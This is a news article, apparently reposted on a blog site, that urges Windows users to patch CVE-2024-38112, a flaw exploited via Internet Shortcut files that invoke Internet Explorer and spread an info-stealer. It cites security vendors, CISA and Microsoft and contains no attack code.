Windows Users Urged to Update Immediately to Protect Against New Threats

Windows Users Urged to Update Immediately to Protect Against New Threats
5 min read

With images of countless blue screens still haunting the headlines, it’s all too easy to forget that while July’s Windows outage was down to CrowdStrike rather than Microsoft, there have been Windows threats also reported this month that you need to protect yourself against right away. Many millions of PCs remain at risk.

Earlier this month, before blue screens of death started trending, both Check Point and Trend Micro advised that Windows 10 and 11 users are now at risk from a “previously unknown” threat that cleverly wakens the Internet Explorer code buried under the covers of hundreds of millions of PCs, exploiting wide-open security holes.

As Check Point reported on July 9, “attackers are using special Windows Internet Shortcut files, which, when clicked, call the retired Internet Explorer (IE) to visit the attacker-controlled URL… By opening the URL with IE instead of the modern and much more secure Chrome/Edge browser on Windows, the attacker gained significant advantages in exploiting the victim’s computer, although the computer is running the modern Windows 10/11 operating system.”

Then just days later, Trend Micro ramped up the threat level, reporting that the vulnerability “was used as a zero-day to access and execute files through the disabled Internet Explorer using MSHTML… infect[ing] victim machines with the Atlantida info-stealer, which focuses on pilfering system information and sensitive data (like passwords and cookies) from various applications.”

Following Check Point’s disclosure, the US government added the vulnerability to its CISA catalog, warning users that Windows has “a spoofing vulnerability that has a high impact to confidentiality, integrity, and availability.”

The vulnerability has been patched, users just need to ensure Windows PCs are updated. CISA’s mandate means US federal employees must apply that update by July 30 or stop using their PCs. All other organizations—and even home users—should follow suit given the current threat landscape. Per Check Point, Trend Micro, and CISA, we know this vulnerability has been exploited in the wild. Worse, Check Point says those attacks have been ongoing for more than 12 months.

Microsoft publicly acknowledged that the vulnerability had been exploited in its July update, telling me “we greatly appreciate [Check Point’s] Haifei Li for this research and for responsibly reporting it under a coordinated vulnerability disclosure. Customers who have installed the update are already protected.”

If there was a doubt as to the scale of risk this vulnerability represents, then research into the potential exposure to this specific attack should change minds. Sevco has just released a report that “zooms in on the specific part of the attack surface at risk because of CVE-2024-38112… “A significant percentage of Windows devices,” they warn, “are fully exposed and at risk of being taken over by attackers.”

The researchers say that analysis of more than 500,000 Windows 10 and Windows 11 devices suggests that “more than 10% of devices are missing endpoint protection controls,” adding that “this means that CISOs and IT organizations are completely blind to tens of thousands of doors and windows (so to speak) wide open for attackers to breach networks and access crown jewel data.”

Check Point told me the vulnerability was “especially surprising… leveraging Internet Explorer, which many users may not realize is even on their computer… All Windows users [should] immediately apply the Microsoft patch to protect themselves.”

Ironically, Internet Explorer isn’t the only Internet Explorer vulnerability to make it onto CISA’s most-dangerous list this month. Another specific warning about a “user after free” Internet Explorer memory vulnerability despite its end-of-life status has also just cropped up. This time around, the CISA mandate is even clearer: “The impacted product is end-of-life and should be disconnected if still in use.”

The pre-update risk for PC users is best summed by Trend Micro, which described it as “a prime example of how unsupported Windows relics are an overlooked attack surface that can still be exploited by threat actors to infect unsuspecting users with ransomware, backdoors, or as a conduit for other kinds of malware.”

The Windows outage this month—regardless of its cause—swamped the news cycle. While the CrowdStrike issue has been painful and costly, it’s not itself a cyber threat—albeit bad actors are now clearly taking advantage of the confusion. The quieter threat per CISA’s warning is exactly the opposite; you won’t know you’ve been hit until it’s too late. So, make sure you apply the update, if it isn’t installed already.

“When IT assets are missing endpoint security,” Sevco advises in its report, “malicious actors have a direct path to their networks,” and while “most enterprises are highly proficient at patching known IT assets,” they warn, “it’s the unpatched, hidden or unknown assets that introduce the highest level of risk.”

All the more reason to adhere to CISA’s warning and its July 30 deadline.

This Microsoft Windows warning impacts more than a billion users.

In case you have found a mistake in the text, please send a message to the author by selecting the mistake and pressing Ctrl-Enter.
Alex 5.3K
Joined: 5 years ago
Comments (0)

    No comments yet

You must be logged in to comment.

Sign In